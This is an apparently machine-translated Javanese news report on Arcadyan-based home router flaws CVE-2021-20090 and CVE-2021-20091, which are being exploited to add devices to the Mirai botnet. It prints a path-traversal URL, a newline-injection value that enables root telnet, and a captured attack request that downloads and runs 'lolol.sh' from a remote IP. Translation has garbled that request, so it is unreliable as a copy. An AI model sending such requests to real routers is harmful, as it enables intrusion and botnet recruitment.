Serangan massive wis direkam ing jaringan marang router ngarep sing perangkat kukuh nggunakake implementasi server HTTP saka perusahaan Arcadyan. Kanggo ngontrol piranti, kombinasi rong kerentanan digunakake sing ngidini eksekusi remot kode sewenang-wenang kanthi hak root. Masalah kasebut mengaruhi sawetara router ADSL sing cukup akeh saka Arcadyan, ASUS lan Buffalo, uga piranti sing diwenehake miturut merek Beeline (masalah kasebut dikonfirmasi ing Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone lan operator telekomunikasi liyane. Kacathet yen masalah wis ana ing perangkat kukuh Arcadyan luwih saka 10 taun lan sajrone wektu iki wis bisa pindhah menyang paling sethithik 20 model piranti saka 17 manufaktur beda.
Kerentanan pisanan, CVE-2021-20090, ndadekake bisa ngakses skrip antarmuka web tanpa otentikasi. Inti saka kerentanan yaiku ing antarmuka web, sawetara direktori sing dikirimake gambar, file CSS lan skrip JavaScript bisa diakses tanpa otentikasi. Ing kasus iki, direktori sing diidini akses tanpa otentikasi dicenthang nggunakake topeng wiwitan. Nemtokake "../" karakter ing dalan kanggo pindhah menyang direktori induk diblokir dening perangkat kukuh, nanging nggunakake kombinasi "..% 2f" dilewati. Mangkono, bisa mbukak kaca sing dilindhungi nalika ngirim panjaluk kaya "http://192.168.1.1/images/..%2findex.htm".
Kerentanan kapindho, CVE-2021-20091, ngidini pangguna sing wis dikonfirmasi kanggo ngowahi setelan sistem piranti kanthi ngirim parameter sing diformat khusus menyang skrip apply_abstract.cgi, sing ora mriksa anané karakter baris anyar ing paramèter. . Contone, nalika nindakake operasi ping, panyerang bisa nemtokake nilai "192.168.1.2%0AARC_SYS_TelnetdEnable=1" ing lapangan kanthi alamat IP sing dicenthang, lan skrip, nalika nggawe file setelan /tmp/etc/config/ .glbcfg, bakal nulis baris "AARC_SYS_TelnetdEnable=1" menyang ", sing ngaktifake server telnetd, sing nyedhiyakake akses cangkang printah sing ora diwatesi kanthi hak root. Kajaba iku, kanthi nyetel parameter AARC_SYS, sampeyan bisa nglakokake kode apa wae ing sistem kasebut. Kerentanan pisanan ndadekake bisa mbukak skrip masalah tanpa otentikasi kanthi ngakses minangka "/images/..%2fapply_abstract.cgi".
Kanggo ngeksploitasi kerentanan, panyerang kudu bisa ngirim panjalukan menyang port jaringan ing ngendi antarmuka web mlaku. Ditilik dening dinamika panyebaran serangan kasebut, akeh operator ninggalake akses menyang piranti saka jaringan eksternal kanggo nyederhanakake diagnosis masalah dening layanan dhukungan. Yen akses menyang antarmuka diwatesi mung ing jaringan internal, serangan bisa ditindakake saka jaringan eksternal nggunakake teknik "DNS rebinding". Kerentanan wis aktif digunakake kanggo nyambungake router menyang botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Sambungan: tutup Agen Panganggo: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Source: opennet.ru